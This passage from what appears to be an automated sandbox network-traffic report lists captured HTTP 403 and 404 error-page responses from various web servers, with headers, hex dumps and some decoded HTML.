2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 31 May 2023 12:51:33 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 31 May 2023 12:51:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 31 May 2023 12:51:34 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: LxvHS7qY/gr4MO7wQData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:34 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:51:34 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 31 May 2023 12:51:35 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: LxvHS7qY/myxOlI9RData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 31 May 2023 12:51:43 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 31 May 2023 12:51:36 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: pvTAOhxs/L878jRfPData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
